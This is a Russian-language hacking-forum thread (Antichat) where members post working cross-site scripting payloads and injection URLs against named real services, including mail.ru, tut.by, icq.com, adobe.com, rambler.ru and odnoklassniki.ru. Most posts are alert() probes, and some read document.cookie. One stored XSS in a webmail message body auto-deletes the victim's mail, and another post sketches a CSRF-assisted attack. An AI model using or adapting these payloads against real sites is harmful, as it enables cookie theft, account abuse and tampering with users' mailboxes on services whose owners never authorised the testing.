Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Unix@, как эту XSS можно использовать на практике?
     
  2. mr.Penguin

    mr.Penguin Member

    Joined:
    8 Mar 2012
    Messages:
    40
    Likes Received:
    37
    Reputations:
    74
    @bigmir.net

    Тип уязвимости: Активная XSS
    Находится в сервисе "Дневники".

    Где найти?
    Мой дневник => Заметки => Добавить заметку​
    Уязвимое поле:
    Теги​
    Пример:
    <script>alert('xss')</script>​
     
  3. Unix@

    Unix@ New Member

    Joined:
    25 Sep 2011
    Messages:
    0
    Likes Received:
    3
    Reputations:
    6
    XSS на Mail.ru

    Работает только у авторизованных.

    Нажать кнопку Продолжить
     
  4. mr.Penguin

    mr.Penguin Member

    Joined:
    8 Mar 2012
    Messages:
    40
    Likes Received:
    37
    Reputations:
    74
    Code:
    http://vashdom.tut.by/search/?search=</title><script>alert('xss')</script>
     
  5. Unix@

    Unix@ New Member

    Joined:
    25 Sep 2011
    Messages:
    0
    Likes Received:
    3
    Reputations:
    6
    TUT.by

    Пассивка TUT.by
     
  6. dev1k

    dev1k Member

    Joined:
    25 Nov 2011
    Messages:
    0
    Likes Received:
    44
    Reputations:
    49
    icq.com

    validate.icq.com/icq/validate.html?uid=1&sid=23"><script>alert('XSS')</script>&lang=en


    adobe.com

    store1.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type="><img src=x: onerror=alert('xss')>&code=adobe&cat=classification
     
    4 people like this.
  7. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Пассивка на ачате))

    PR 5 | GI - 4 980 000 | CY 240 | 243 000 :D

    Античат конечно не почтовый сервис, но я думаю меня простят)))


    http://video.antichat.ru/video/Номер видео/

    Post запрос
    Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (ссылка )
     
    #187 eclipse, 31 Mar 2012
    Last edited: 31 Mar 2012
    1 person likes this.
  8. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл ;)
     
  9. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85

    Действительно, херня какая-то :D ))))
    Оказывается при выполнении функции отправки комментария и происходит инжект, в код который занимается собственно отправкой:
    Code:
    function ajaxComment(){  //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;
                  [COLOR=Red]  var author = document.getElementsByName('author')[1].value;
                    var message = document.getElementsByName('comment')[0].value;[/COLOR]
                    var csrf = document.getElementsByName('csrfmiddlewaretoken')[0].value;
                    $.ajax({
    			type: "POST",
                            url: document.location.href,
                            data: "csrfmiddlewaretoken="+csrf+"&author="+author+"&comment="+message,
    			success: function() {
    				$('#comment').hide().append('<div class="comment-box"><div class="comment-top"><span class="comment-box-nick">'+author+'</span> написал</div><p>'+message+'</p></div>').show('slow');
    				}
    			});
    	return false;
    						
    } 
    И хотя данные после отправки на php чистятся, сама возможность инъекции присутствует, но ее нельзя удаленно эксплуатировать, потому что страница защищена опять такие тем самым токеном, если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос

    А моя статья оказывается тут нифига не поможет, потому что она нужна когда есть удаленный xss и требуется csrf, а у нас нет удаленного xss ))
     
    #189 eclipse, 31 Mar 2012
    Last edited: 31 Mar 2012
  10. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Но человек должен вставить свой код и нажать кнопку отправки. Есть идеи насчет практической реализации атаки?

    Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.
     
    #190 M_script, 31 Mar 2012
    Last edited: 31 Mar 2012
    1 person likes this.
  11. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Я тоже самое сказал)) Имелось ввиду что можно было бы кликабельную пассивку получить..

    Насчет практики, нет, не юзабельно (удаленно)

    Хотя, теоретически))

    Можно:
    1.отправить человека на свой php скрипт
    2.скрипт выводит iframe с античатом
    3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент
    4.инжект выполнится))

    Ну в общем это из раздела фантастики))))
     
    #191 eclipse, 31 Mar 2012
    Last edited: 31 Mar 2012
  12. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Не получится. http://ru.wikipedia.org/wiki/Правило_ограничения_домена
     
  13. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    km.ru

    После ошибки авторизации на главной странице, вы будете перенаправлены на http://n.mail.km.ru/extra/form. Не фильтруется поле "Пароль".

    Post:
    PHP:
    user_login=support-mail&user_domain=freemail.ru&user_password=%22%3E%3Cscript%3Ealert%28%27Hello%2C+world%27%29%3B%3C%2Fscript%3E&op=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&form_build_id=form-a080de13ffb21494853525a2e1c6cf72&form_id=_imap_mail_extra_login_form
    Утверждение верно для всех доменов, кроме km.ru (@freemail.ru, @bossmail.ru etc.)
     
    1 person likes this.
  14. Unix@

    Unix@ New Member

    Joined:
    25 Sep 2011
    Messages:
    0
    Likes Received:
    3
    Reputations:
    6
    Активная xss в теле письма на 59.ru

    Активная xss в теле письма на http://59.ru/
    Почта
    Xss код
    HTML:
    <img src=k onerror=alert('xss') >
    Далее я сделал бонус,автоудаление письма

    Код автоудаление письма

    HTML:
    <img src=k onerror=mod_mail_message_form_action('messages_delete'); >
    Я бы этот код запихал в JS фаил и вызвал через xss.

    Но есть но,нужно сделать очистку корзины,поэтому надо делать через Js фаил.

    PS создайте тему с активными xss в теле письма пжл.
     
    1 person likes this.
  15. Unix@

    Unix@ New Member

    Joined:
    25 Sep 2011
    Messages:
    0
    Likes Received:
    3
    Reputations:
    6
    Активная xss на foto.meta.ua

    Активка тут http://foto.meta.ua/4552903.image

    Уязвимый код тэги

    " onmouseover='alert(document.cookie)'

    Выполняется принаведении на тэги.
     
  16. Марок

    Марок Banned

    Joined:
    22 Apr 2012
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    job.gala.net


    http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email="><script>alert('xz che za')</script>
     
  17. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    http://avia.rambler.ru/anytime?max_days=%3Cimg%20src=x:%20onerror=alert(document.cookie)%3E
    http://avia.rambler.ru/anytime?min_days=%3Cimg%20src=x:%20onerror=alert(document.cookie)%3E
     
    1 person likes this.
  18. _Spamer_

    _Spamer_ Elder - Старейшина

    Joined:
    3 Feb 2009
    Messages:
    83
    Likes Received:
    140
    Reputations:
    16
    Пассивная XSS odnoklassniki.ru
    https://cards2.odnoklassniki.ru/index.html?ServiceDescr=<b>XSS</b>
     
    3 people like this.
  19. _Spamer_

    _Spamer_ Elder - Старейшина

    Joined:
    3 Feb 2009
    Messages:
    83
    Likes Received:
    140
    Reputations:
    16
    Пассивная XSS odnoklassniki.ru
    http://api.odnoklassniki.ru/fb.do?method=users.getInfo&js_callback=<BODY ONLOAD=alert('XSS')>
     
    1 person likes this.
  20. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Пассивная XSS в mail.ru

    Пассивная XSS в mail.ru работает в опере

    Code:
    http://gameshop.mail.ru/order/?back=%22%3E%3Cscript%3Ealert%28%29%3C/script%3E
    //Может ещё выложу ;)